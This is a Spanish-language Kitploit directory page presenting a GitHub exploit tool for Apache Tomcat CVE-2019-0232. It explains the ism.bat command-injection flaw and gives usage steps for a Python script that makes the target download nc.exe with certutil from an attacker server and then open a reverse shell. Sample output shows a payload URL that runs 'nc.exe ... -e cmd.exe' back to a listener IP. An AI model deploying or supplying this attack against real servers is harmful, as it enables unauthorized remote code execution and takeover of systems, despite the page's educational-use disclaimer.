Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-0232 — Hola, este es un código revisado y mejorado para CVE-2019-0232 | Kitploit
Herramientas/GitHubGitHub/dharan10/cve-2019-0232
Generación de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHubdharan10/cve-2019-0232

CVE-2019-0232

Hola, este es un código revisado y mejorado para CVE-2019-0232

Ver Repositorio
22hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit para Apache Tomcat CVE-2019-0232

Este script explota la vulnerabilidad CVE-2019-0232 en Apache Tomcat, que permite la ejecución remota de código mediante el manejo inadecuado del script ism.bat. El script emplea una técnica de reverse shell utilizando certutil y nc.exe (Netcat) para obtener acceso remoto al sistema vulnerable.

Descripción general de la vulnerabilidad:

  • ID de CVE: CVE-2019-0232
  • Productos afectados: Apache Tomcat 6.x, 7.x, 8.x y 9.x
  • Descripción:
    • CVE-2019-0232 es una vulnerabilidad en la forma en que Apache Tomcat maneja las solicitudes a ism.bat, que podría permitir a los atacantes ejecutar comandos arbitrarios en el servidor. Esta vulnerabilidad se produce debido a la falta de validación adecuada de la entrada del usuario, lo que permite a los atacantes provocar la ejecución de comandos arbitrarios mediante una solicitud especialmente diseñada.
    • La vulnerabilidad puede explotarse para descargar un archivo nc.exe malicioso de un servidor remoto y utilizarlo para generar una reverse shell.

Requisitos:

  • Python 3: El script está diseñado para Python 3.x.
  • Netcat: Un listener de Netcat (nc.exe) debe estar alojado en un servidor para la conexión de reverse shell.
  • Apache Tomcat: El servidor objetivo debe estar ejecutando una versión vulnerable de Apache Tomcat (6.x, 7.x, 8.x o 9.x) que sea susceptible a CVE-2019-0232.

Cómo funciona:

  1. Descargar nc.exe: El script envía una solicitud especialmente diseñada al servidor Tomcat vulnerable para descargar el archivo nc.exe (Netcat) en la máquina objetivo mediante certutil.
  2. Reverse Shell: Una vez descargado nc.exe, se envía otra solicitud para ejecutar el comando de reverse shell, que se conecta de vuelta al listener de Netcat del atacante.

Uso:

1. Clonar el repositorio:

root@kitploit:~
git clone https://github.com/Dharan10/CVE-2019-0232.git
cd CVE-2019-0232

2. Editar el script o ejecutarlo con entradas del usuario:

root@kitploit:~
python3 exploit.py

3. Se le solicitará que ingrese los siguientes detalles:

root@kitploit:~
Target Host: The IP address of the Apache Tomcat server to exploit.
Target Port: The port of the target server (default: 8080).
Server IP: The IP address of the server hosting nc.exe.
Server Port: The port number where nc.exe is hosted (default: 80).
Netcat Listener IP: Your IP address that will receive the reverse shell.
Netcat Listener Port: The port on which you are listening for the reverse shell.

Ejemplo:

root@kitploit:~
[*] Sending payload to download nc.exe...
[+] URL1 Response: 200
[*] Sending payload to execute reverse shell...
[+] URL2 Response: 200
[*] Reverse shell payload URL: http://192.168.1.10:8080/cgi/ism.bat?&nc.exe+192.168.1.100+1234+-e+cmd.exe

Una vez ejecutado con éxito, debería tener una conexión de reverse shell de vuelta a su listener de Netcat.

Descargo de responsabilidad:

Este script está destinado únicamente a fines educativos. No lo utilice para actividades maliciosas. Obtenga siempre la autorización adecuada antes de intentar cualquier prueba de penetración o auditoría de seguridad. El uso indebido de este script podría conllevar consecuencias legales.

Notas importantes:

Asegúrese de que el servidor Apache Tomcat no esté parcheado contra CVE-2019-0232 antes de usar este exploit. El script puede requerir privilegios administrativos dependiendo de la configuración del sistema objetivo.

Autor:

Autor: A!Z3N(Dharan) ¡Hecho con poder!

Licencia:

Este proyecto está licenciado bajo la Licencia MIT.

Sin embargo, úselo bajo su propio riesgo. Este código se proporciona únicamente con fines educativos. Al usar este código, acepta asumir toda la responsabilidad por cualquier acción resultante de su uso. El uso indebido o no autorizado de este exploit puede conllevar consecuencias legales. Obtenga siempre la autorización adecuada antes de realizar cualquier prueba de seguridad o prueba de penetración en cualquier sistema.

Es libre de usar, modificar y distribuir este código, pero solo con fines éticos. El autor no es responsable de ningún daño causado por este código.

No utilice este exploit sin el permiso explícito del propietario del sistema objetivo.

Descargar herramienta